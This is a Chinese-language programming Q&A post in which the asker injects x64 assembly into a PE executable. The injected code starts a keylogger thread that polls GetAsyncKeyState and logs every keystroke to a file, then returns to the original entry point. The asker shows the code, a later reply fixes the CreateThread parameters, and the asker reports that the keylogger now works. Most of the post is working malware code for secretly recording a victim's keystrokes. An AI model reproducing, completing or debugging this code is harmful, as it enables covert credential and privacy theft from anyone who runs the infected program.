
我正在尝试将此代码注入 PE 文件以使用 CreateThread 运行我的程序以在 PE 文件中运行键盘记录器,但 CreateThread 失败并出现 3E6h ERROR_NOACCESS 错误。我在下面的源代码中的错误在哪里?

procedure:
sub rsp, 28h            
and rsp, 0fffffffffffffff0h     
lea rdx,[loadlibrary7]
lea rcx,[kernel32dll]
call MyGetProcAddress                

lea rcx, [user32dll]
call rax                


lea rdx, [createthread7]
lea rcx, [kernel32dll]
call MyGetProcAddress         
lea rbx,[pThread]                                                                                                    ;     

lea rbx,[ThreadId]
mov qword[rsp+20h], rbx
lea r9,[Par]
lea r8,[KL]
xor rdx,rdx
lea rcx,[SECURITY_ATTRIBUTES_]
call rax


add rsp, 28h            
db 0                    ;JMP PARA OEP
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0


proc KL
REPS:
lea rdx,[loadlibrary7]
lea rcx,[kernel32dll]
call MyGetProcAddress                

lea rcx, [user32dll]
call rax                

lea rdx, [getasync]
lea rcx, [user32dll]
call MyGetProcAddress         
MOV [GETKEYS],RAX

Label001:
mov [VIRTUAL_KEY_CODE],8
L0:
cmp [VIRTUAL_KEY_CODE],255
ja La1
mov rcx,[VIRTUAL_KEY_CODE]
MOV RAX,[GETKEYS]
call rax
cmp eax,-32767
MOV RAX,[GETKEYS]
jz Label1
inc [VIRTUAL_KEY_CODE]
jmp L0
La1:
mov [VIRTUAL_KEY_CODE],8
jmp Label001
Label1:

lea rdx,[loadlibrary7]
lea rcx,[kernel32dll]
call MyGetProcAddress         


lea rcx, [msvcrtdll]
call rax                


lea rdx, [fopen7]
lea rcx,[msvcrtdll]
call MyGetProcAddress                     

lea r8, [filemode]
lea rdx, [file_name]
lea rcx,[fp]
call rax                ;TO LOG KEYSTROKES

lea rdx, [fwrite7]
lea rcx,[msvcrtdll]
call MyGetProcAddress         


mov r9,[fp]
mov r8,1
mov rdx,1
lea rcx, [VIRTUAL_KEY_CODE]
call rax                ;TO LOG KEYSTROKES

lea rdx, [fclose7]
lea rcx,[msvcrtdll]
call MyGetProcAddress         

mov rcx,[fp]
call rax

jmp REPS
endp

proc MyGetProcAddress
...
ret
endp
kernel32dll            db  'KERNEL32.DLL', 0
loadlibrary7            db  'loadlibraryA', 0
user32dll              db  'USER32.DLL', 0
createthread7       db  'CreateThread', 0
msvcrtdll              db  'MSVCRT.DLL', 0
getasync                db  'GetAsyncKeyState', 0
fopen7              db  'fopen_s', 0
fwrite7             db  'fwrite',0
fclose7             db  'fclose',0
exitproc7           db  'ExitProcess', 0
filemode                db   'a',0
file_name               db   'log',0
pThread                 dq   0
struct SECURITY_ATTRIBUTES
A dd 0
B dq 0
C dd 0
ends
SECURITY_ATTRIBUTES_ SECURITY_ATTRIBUTES
GEYKEYS                 dq   0
VIRTUAL_KEY_CODE        dq   0
fp                      dq   0
Par                     dq   0
... 



我已经初始化了我的源:

mov qword[rsp+20h], 0
lea rbx,[ThreadId]
mov qword[rsp+28h], rbx
lea r9,[Par]
lea r8,[KL]
xor rdx,rdx
lea rcx,[SECURITY_ATTRIBUTES_]
call rax

现在我的键盘记录器运行良好。谢谢你帮助我。

于 2017-03-19T17:34:47.560 回答